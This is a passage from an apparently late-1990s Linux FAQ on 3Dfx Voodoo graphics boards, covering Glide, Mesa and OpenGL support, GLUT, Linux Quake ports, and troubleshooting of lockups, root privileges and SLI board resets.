this, especially on Mesa and Glide with a commercial X Server that has
GLX support.

8.6. Glide and SVGA?

You should have no problems running Glide based applications either
single or dual screen using VGA modes. It might be a good idea to set
up the 640x480 resolution in the SVGA modes, too, if you are using a
single screen setup.

8.7. Glide and GGI?

A GGI driver for Glide is under development by Jon M. Taylor, but has
not officially been released and was put on hold till completion of
GGI 0.0.9. For information about GGI see
If you are adventurous, you might find the combination of XGGI (a GGI
based X Server for XFree86) and GGI for Glide an interesting prospect.
There is also a GGI driver interfacing the OpenGL API; tested with
unaccelerated Mesa. Essentially, this means X11R6 running on a Voodoo
Graphics (tm), using either Mesa or Glide directly.

9. FAQ: OpenGL/Mesa?

9.1. What is OpenGL?

OpenGL is an immediate mode graphics programming API originally
developed by SGI based on their previous proprietary Iris GL, and
became in industry standard several years ago. It is defined and
maintained by the Architectural Revision Board (ARB), an organization
that includes members as SGI, IBM, and DEC, and Microsoft.

OpenGL provides a complete feature set for 2D and 3D graphics
operations in a pipelined hardware accelerated architecture for
triangle and polygon rendering. In a broader sense, OpenGL is a
powerful and generic toolset for hardware assisted computer graphics.

9.2. Where to get additional information on OpenGL?

The official site for OpenGL maintained by the members of the ARB, is,

A most recommended site is Mark Kilgard's Gateway to OpenGL Info at it provides pointers to
book, online manual pages, GLUT, GLE, Mesa, ports to several OS, tons
of demos and tools.

If you are interested in game programming using OpenGL, there is the at Be warned, this
is a high traffic list with very technical content, and you will
probably prefer to use procmail to handle the 100 messages per day
coming in. You cut down bandwidth using the SET OpenGL-GameDev-L
DIGEST command. It is also not appropriate if you are looking for
introductions. The archive is handled by the ListServ software, use
the INDEX OpenGL-GameDev-L and GET OpenGL-GameDev-L "filename"
commands to get a preview before subscribing.

9.3. Is Glide an OpenGL implementation?

No, Glide is a proprietary 3Dfx API which several features specific to
the Voodoo Graphics (tm) and Voodoo Rush (tm). A 3Dfx OpenGL is in
preparation (see below). Several Glide features would require
EXTensions to OpenGL, some of which already found in other
implementations (e.g. paletted textures).

The closest thing to a hardware accelerated Linux OpenGL you could
currently get is Brian Paul's Mesa along with David Bucciarelli's Mesa
Voodoo driver (see below).

9.4. Is there an OpenGL driver from 3Dfx?

Both the 3Dfx website and the Quantum3D website announced OpenGL for
Voodoo Graphics (tm) to be available 4Q97. The driver is currently in
Beta, and accessible only to registered deverloper's under written
Beta test agreement.

A linux port has not been announced yet.

9.5. Is there a commercial OpenGL for Linux and 3Dfx?

I am not aware of any third party commercial OpenGL that supports the
Voodoo Graphics (tm). Last time I paid attention, neither MetroX nor
XInside OpenGL did.

9.6. What is Mesa?

Mesa is a free implementation of the OpenGL API, designed and written
by Brian Paul, with contributions from many others. Its performance is
competitive, and while it is not officially certified, it is an almost
fully compliant OpenGL implementation conforming to the ARB
specifications - more complete than some commercial products out,

9.7. Does Mesa work with 3Dfx?

The latest Mesa MesaVer; release works with Linux Glide 2.4. In fact,
support was included in earlier versions, however, this driver is
still under development, so be prepared for bugs and less than optimal
performance. It is steadily improving, though, and bugs are usually
fixed very fast.

You will need to get the Mesa library archive from the FTP site. It is recommended to subscribe to the
mailing list as well, especially when trying to track down bugs,
hardware, or driver limitations. Make sure to get the most recent
distribution. A Mesa-3.0 is in preparation.

9.8. How portable is Mesa with Glide?

It is available for Linux and Win32, and any application based on Mesa
will only have the usual system specific code, which should usually
mean XWindows vs. Windows, or GLX vs. WGL. If you use e.g. GLUT or Qt,
you should get away with any system specifics at all for virtually
most applications. There are only a few issues (like sampling relative
mouse movement) that are not adressed by the available portable GUI

Mesa/Glide is also available for DOS. The port which is 32bit DOS is
maintained by Charlie Wallace and kept up to date with the main Mesa
base. See the most current releases.

9.9. Where to get info on Mesa?

The Mesa home page is at There
is an archive of the Mesa mailing list. at
This list is not specific to 3Dfx and Glide, but if you are interested
in using 3Dfx hardware to accelerate Mesa, it is a good place to

9.10. Where to get information on Mesa Voodoo?

For latest information on the Mesa Voodoo driver maintained by David
Bucciarelli see the home page at www-

9.11. Does Mesa support multitexturing?

Not yet (as of Mesa 2.6), but it is on the list. In Mesa you will
probably have to use the OpenGL EXT_multitexture extension once it is
available. There is no final specification for multitextures in
OpenGL, which is supposed to be part of the upcoming OpenGL 1.2
revision. There might be a Glide driver specific implementation of the
extension in upcoming Mesa releases, but as long as only certain
Quantum3D Obsidian boards come with multiple TMU's, it is not a top
priority. This will surely change once Voodoo 2 (tm) based boards are
in widespread use.

9.12. Does Mesa support single pass trilinear mipmapping?

Multiple TMU's should be used for single pass trilinear mipmapping for
improvement image quality without performance penalty in current Linux
Glide already. Mesa support is not yet done (as of Mesa 2.6), but is
in preparation.

9.13. What is the Mesa "Window Hack"?

The most recent revisions of Mesa contain an experimental feature for
Linux XFree86. Basically, the GLX emulation used by Mesa copies the
contents of the Voodoo Graphics (tm) board's most recently finished
framebuffer content into video memory on each glXSwapBuffers call.
This feature is also available with Mesa for Windows.

This obviously puts some drain on the PCI, doubled by the fact that
this uses X11 MIT SHM, not XFree86 DGA to access the video memory. The
same approach could theoretically be used with e.g. SVGA. The major
benefit is that you could use a Voodoo Graphics (tm) board for
accelerated rendering into a window, and that you don't have to use
the VGA passthrough mode (video output of the VGA board deteoriates in
passing through, which is very visible with high end monitors like
e.g. EIZO F784-T).

Note that this experimental feature is NOT Voodoo Rush (tm) support by
any means. It applies only to the Voodoo Graphics (tm) based boards.
Moreover, you need to use a modified GLUT, as interfacing the window
management system and handling the events appropriately has to be done
by the application, it is not handled in the driver.

Make really sure that you have enabled the following environment

export SST_VGA_PASS=1 # to stop video signal switching
export SST_NOSHUTDOWN=1 # to stop video signal switching
export MESA_GLX_FX="window" # to initiate Mesa window mode

If you manage to forget one of the SST variables, your VGA board will
be shut off, and you will loose the display (but not the actual X). It
is pretty hard to get that back being effectively blind.

Finally, note that the libMesaGL.a (or .so) library can contain
multiple client interfaces. I.e. the GLX, OSMesa, and fxMesa (and
even SVGAMesa) interfaces call all be compiled into the same
libMesaGL.a. The client program can use any of them freely, even
simultaneously if it's careful.

9.14. How about GLUT?

Mark Kilgard's GLUT distribution is a very good place to get sample
applications plus a lot of useful utilities. You will find it at, and you should get it anyway. The
current release is GLUT 3.6, and discussion on a GLUT 3.7 (aka
GameGLUT) has begun. Note that Mark Kilgard has left SGI recently, so
the archive might move some time this year - for the time being it
will be kept at SGI.

There is also a GLUT mailing list, Send mail to, with the (on of the) following in the body of your
email message:

info glut
subscribe glut

As GLUT handles double buffers, windows, events, and other operations
closely tied to hardware and operating system, using GLUT with Voodoo
Graphics (tm) requires support, which is currently in development
within GLX for Mesa. It already works for most cases.

10. FAQ: But Quake?

10.1. What about that 3Dfx GL driver for Quake?

The 3Dfx Quake GL, aka mini-driver, aka miniport, aka Game GL, aka
3Dfx GL alpha, implemented only a Quake-specific subset of OpenGL (see for an inofficial list of
supported code paths). It is not supported, and not updated anymore.
It was a Win32 DLL (opengl32.dll) released by 3Dfx and was available
for Windows only. This DLL is not, and will not be ported to Linux.

10.2. Is there a 3Dfx based glQuake for Linux?

Yes. A Quake linuxquake v0.97 binary has been released based on Mesa
with Glide. The Quake2 q2test binary for Linux and Voodoo Graphics
(tm) has been made available as well. A full Quake2 for Linux was
released in January 1998, with linuxquake2-3.10. Dave "Zoid" Kirsch is
the official maintainer of all Linux ports of Quake, Quakeworld, and
Quake2, including all the recent Mesa based ports. Note that all Linux
ports, including the Mesa based ones, are not officially supported by
id Software.

See for the latest releases.

10.3. Does glQuake run in an XFree86 window?

A revision of Mesa and the Mesa-based Linux glQuake is in preparation.
Mesa already does support this by GLX, but Linux glQuake does not use

10.4. Known Linux Quake problems?

Here is an excerpt, as of January 7th, 1998. I omitted most stuff not
specific to &3Dfx; hardware.

o You really should run Quake2 as root when using the SVGALib and/or
GL renders. You don't have to run as root for the X11 refresh, but
the modes on the mouse and sound devices must be read/writable by
whatever user you run it as. Dedicated server requires no special

o X11 has some garbage on the screen when 'loading'. This is normal
in 16bit color mode. X11 doesn't work in 24bit (TrueColor). It
would be very slow in any case.

o Some people are experiencing crashes with the GL renderer. Make
sure you install the libMesa that comes with Quake2! Older versions
of libMesa don't work properly.

o If you are experience video 'lag' in the GL renderer (the frame
rate feels like it's lagging behind your mouse movement) type
"gl_finish 1" in the console. This forces update on a per frame

o When running the GL renderer, make sure you have killed selection
and/or gpm or the mouse won't work as they won't "release" it while
Quake2 is running in GL mode.

10.5. Know Linux Quake security problems?

As Dave Kirsch posted on January 28th, 1998: an exploit for Quake2
under Linux has been published. Quake2 is using shared libraries.
While the READMRE so far does not specifically mention it, note that
Quake2 should not be setuid.

If you want to use the ref_soft and ref_gl renderers, you should run
Quake2 as root. Do not make the binary setuid. You can only run both
those renderers at the console only, so being root is not that much of
an issue.

The X11 render does not need any root permissions (if /dev/dsp is
writable by others for sound). The dedicated server mode does not
need to be root either, obviously.

Problems such as root requirements for games has been sort of a sore
spot in Linux for a number of years now. This is one of the goals that
e.g. GGI is targetting to fix. A ref_ggi might be supported in the
near future.

10.6. Does LinuxQuake use multitexturing?

To my understadnding, glQuake will use a multitexture EXTension if the
OpenGL driver in question offers it. The current Mesa implementation
and the Glide driver for Linux do not yet support this extension, so
for the time being the answer is no. See section on Mesa and
multitexturing for details.
10.7. Where can I get current information on Linux glQuake?

Try some of these sites: the "The Linux Quake Resource" at, or the "Linux Quake Page" at Alternatively, you could look
for Linux Quake sites in the "SlipgateCentral" database at

11. FAQ: Troubleshooting?

11.1. Has this hardware been tested?

See hardware requirements list above. I currently do not maintain a
conclusive list of vendors and boards, as no particular board specific
problems have been verified. Currently, only 3Dfx and Quantum3D
provide boards for testing to the developers, so Quantum3D consumer
boards are a safe bet. Every other Voodoo Graphics (tm) based board
should work, too. I have reports regarding the Orchid Righteous 3D,
Guillemot Maxi 3D Gamer, and Diamond Monster 3D.

If you are a board manufacturer who wants to make sure his Voodoo
Graphics (tm), Voodoo Rush (tm) or Voodoo 2 (tm) boards work with
upcoming releases of Linux, Xfree86, Linux Glide and/or Mesa, please
contact me, and I will happily forward your request to the persons
maintaining the drivers in question. If you are interested in support
for Linux Glide on other then the PC platfrom, e.g. DEC Alpha, please
contact the maintainer of Linux Glide Daryll Strauss, at

11.2. Failed to change I/O privilege?

You need to be root, or setuid your application to run a Glide based
application. For DMA, the driver accesses /dev/mem, which is not
writeable for anybody but root, with good reasons. See the README in
the Glide distribution for Linux.

11.3. Does it work without root privilege?

There are compelling case where the setuid requirement is a problem,
obviously. There are currently solutions in preparation, which require
changes to the library internals itself.

11.4. Displayed images looks awful (single screen)?

If you are using the analog pass through configuration, the common
SVGA or X11 display might look pretty bad. You could try to get a
better connector cable than the one provided with the accelerator
board (the ones delivered with the Diamond Monster 3D are reportedly
worse then the one accompanying the Orchid Righteous 3D), but up to a
degree there will inevitably be signal loss with an additional
transmission added.

If the 640x480 full screen image created by the accelerator board does
look awful, this might indicate a real hardware problem. You will have
to contact the board manufacturer, not 3Dfx for details, as the
quality of the video signal has nothing to do with the accelerator -
the board manufacturer chooses the RAMDAC, output drivers, and other
components responsible.

11.5. The last frame is still there (single or dual screen)?

You terminated your application with Ctrl-C, or it did not exit
normally. The accelerator board will dutifully provide the current
content of the framebuffer as a video signal unless told otherwise.

11.6. Powersave kicks in (dual screen)?

When you application terminates in dual screen setups, the accelerator
board does not provide video output any longer. Thus powersave kicks
each time. To avoid this, use


11.7. My machine seem to lock (X11, single screen)?

If you are running X when calling a Glide application, you probably
moved the mouse out of the window, and the keyboard inputs do not
reach the application anymore.

If you application is supposed to run concurrently with X11, it is
recommend to expose a full screen window, or use the XGrabPointer and
XGrabServer functions to redirect all inputs to the application while
the X server cannot access the display. Note that grabbing all input
with XGrabPointer and XGrabServer does not qualify as well-behaved
application, and that your program might block the entire system.

If you experience this problem without running X, be sure that there
is no hardware conflict (see below).

11.8. My machine locks (single or dual screen)?

If the system definitely does not respond to any inputs (you are
running two displays and know about the loss of focus), you might
experience a more or less subtle hardware conflict. See installation
troubleshooting section for details.

If there is no obvious address conflict, there might still be other
problems (below). If you are writing your own code the most common
reason for locking is that you didn't snap your vertices. See the
section on snapping in the Glide documentation.

11.9. My machine locks (used with S3 VGA board)?

It is possible you have a problem with memory region overlap specific
to S3. There is some info and a patch to the so-called S3 problem in
the 3Dfx web site, but these apply to Windows only. To my
understanding, the cause of the problem is that some S3 boards (older
revisions of Diamond Stealth S3 968) reserve more memory space than
actually used, thus the Voodoo Graphics (tm) has to be mapped to a
different location. However, this has not been reported as a problem
with Linux, and might be Windows-specific.
11.10. No address conflict, but locks anyway?

If you happen to use a motherboard with non-standard or incomplete PCI
support, you could try to shuffle the boards a bit. I am running an
ASUS TP4XE that has that non-standard modified "Media Slot", i.e. PCI
slot4 with additional connector for ASUS-manufactured SCSI/Sound combo
boards, and I experienced severe problems while running a Diamond
Monster 3D in that slot. The system operates flawlessly since I put
the board in one of the regular slots.

11.11. Mesa runs, but does not access the board?

Be sure that you recompiled all the libraries (including the toolkits
the demo programs use - remember that GLUT does not yet support Voodoo
Graphics (tm)), and that you removed the older libraries, run
ldconfig, and/or set your LD_LIBRARY_PATH properly. Mesa supports
several drivers in parallel (you could use X11 SHM, off screen
rendering, and Mesa Voodoo at the same time), and you might have to
create and switch contexts explicitely (see MakeCurrent function) if
the Voodoo Graphics (tm) isn't chosen by default.

11.12. Resetting dual board SLI?

If a Quantum 3D Obsidian board using in an SLI setup exits abruptly
(i.e., the application crashes, or is aborted by user), the boards are
left in an undefined state. With the dual-board set, you can run a
program called resetsli to reset them. Until you run the resetsli
program, you will not be able to re-initialize the Obsidian board.

11.13. Resetting single board SLI?

The resetsli program mentioned above does not yet work with a single
board Obsidian SLI (e.g. the Obsidian 100-4440SB). You will have to
reboot your system by reset in order to reset the board.